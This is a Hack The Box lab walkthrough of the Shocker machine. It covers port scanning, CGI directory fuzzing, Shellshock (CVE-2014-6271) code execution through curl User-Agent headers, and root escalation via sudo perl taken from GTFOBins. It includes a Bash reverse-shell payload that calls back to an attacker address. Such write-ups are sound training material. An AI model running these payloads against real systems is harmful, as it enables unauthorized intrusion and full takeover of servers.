
Structured HTB walkthrough demonstrating Shellshock (CVE-2014-6271) exploitation via CGI directory fuzzing and privilege escalation through misconfigured sudo Perl permissions using GTFOBins.
A structured and professional walkthrough showcasing the identification and manual exploitation of the critical Shellshock vulnerability, followed by local privilege escalation via misconfigured sudo rights on a Linux target.
10.10.10.56/usr/bin/perl)The assessment begins with a rapid, full-port TCP SYN scan targeting only open ports (--open) while bypassing host discovery (-Pn) and DNS resolution (-n) to accelerate footprinting.
nmap -Pn -n -p- -sS --min-rate 5000 --open 10.10.10.56
The initial sweep reveals two active services. We conduct a secondary targeted scan to execute aggressive version detection (-sCV) and script-based vulnerability assessment:
nmap -sCV -p80,2222 --script="safe and vuln" 10.10.10.56
In parallel with our vulnerability scans, we initiate web directory brute-forcing using gobuster to map out hidden resources on the Apache server. We leverage a standard wordlist from the SecLists framework:
gobuster dir -u [http://10.10.10.56/](http://10.10.10.56/) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 20
The fuzzing process identifies an unindexed /cgi-bin/ directory. In legacy web deployments, Apache servers utilize the Common Gateway Interface (CGI) to execute server-side scripts. Given the machine name and the presence of this folder, we aggressively look for executable scripts (e.g., .sh, .cgi) that might be susceptible to environmental variable injection flaws.
Further enumeration reveals a script named user.sh residing inside the /cgi-bin/ directory.
The Shellshock (CVE-2014-6271) vulnerability allows attackers to execute arbitrary operating system commands by injecting malicious function definitions inside HTTP request headers (such as User-Agent) processed by vulnerable Bash instances.
We craft a customized curl command to send a Proof of Concept (PoC) payload designed to force the remote system to execute the /usr/bin/id command:
curl -H "User-Agent: () { :; }; echo; /usr/bin/id" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)
id command, validating authenticated-like unauthenticated Remote Code Execution (RCE).To upgrade our execution vector into an interactive session, we establish a local Netcat listener on our attack platform:
nc -lvnp 4444
Next, we inject a native Bash reverse shell string within the malicious User-Agent header to force a callback over TCP:
curl -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/<YOUR_TUN0_IP>/4444 0>&1" [http://10.10.10.56/cgi-bin/user.sh](http://10.10.10.56/cgi-bin/user.sh)
Upon successful execution, we receive a stable low-privilege shell:
$ whoami
shelly
With a functional user context on the system, we audit our local restrictions. We query the sudo configuration to determine if the shelly user is authorized to execute commands with elevated permissions without supplying a password:
sudo -l
The output reveals the following high-risk entry:
User shelly may run the following commands on shocker:
(root) NOPASSWD: /usr/bin/perl
Because we have unrestricted, unauthenticated access to execute the perl binary as root, we can easily break out of the binary restrictions. Cross-referencing GTFOBins, we find an execution wrapper that instructs Perl to drop into a native system shell (/bin/sh) retaining the execution identity context (root):
sudo -u root perl -e 'exec "/bin/sh"'
We immediately achieve full administrative execution context:
# whoami
root
Now that root access has been established, we navigate to the relevant home directories to retrieve the compromise proofs.
# Access User Flag
cat /home/shelly/user.txt
# Access Root Flag
cat /root/root.txt
perl, python, or bash via sudo introduces instant escalation vectors. Sudo access should be confined to non-interactive, highly controlled administrative scripts.